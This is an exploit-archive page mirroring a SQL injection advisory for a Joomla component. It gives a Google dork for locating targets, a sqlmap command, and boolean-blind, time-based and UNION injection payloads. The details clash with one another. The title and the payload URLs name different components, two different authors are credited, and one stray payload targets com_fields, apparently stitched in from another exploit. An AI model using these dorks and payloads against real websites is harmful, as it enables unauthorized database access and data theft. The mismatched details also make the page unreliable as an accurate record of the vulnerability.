Advertisement






Joomla omponent iPhone homepage icon 2.0.0 Parameter SQL Injection

CVE Category Price Severity
CVE-2019-13991 CWE-89 $500 High
Author Risk Exploitation Type Date
Yassine Aboukir High Remote 2019-04-08
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040062

Below is a copy:

Joomla omponent iPhone homepage icon 2.0.0 Parameter SQL Injection
"Joomla omponent iPhone homepage icon 2.0.0  Parameter SQL Injection"


# Exploit Title:Joomla Component iPhone homepage icon 2.0.0  - SQL Injection
# Date: 2019-04-05
# Exploit Author:mohsenmohsenzadeh
# Vendor Homepage:https://extensions.joomla.org/extension/iPhone homepage icon/
# Version:2.0.0 [Final Version]
# Tested on: Win,Linux 
# Google Dork:  
 inurl:"index.php?option=com_iPhone homepage icon

Sqlmap: 
 
sqlmap -u "http://Target/index.php?option=com_ccnewsletter&view=detail&id=73&sbid=[SQL]&tmpl=newsletter" -p sbid --dbs
 

Testing Method:
  - boolean-based blind
  - time-based blind
  - UNION query



Parameter: sbid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND 3881=3881&tmpl=newsletter

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND SLEEP(5)&tmpl=newsletter
    Type: AND/OR time-based blind

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.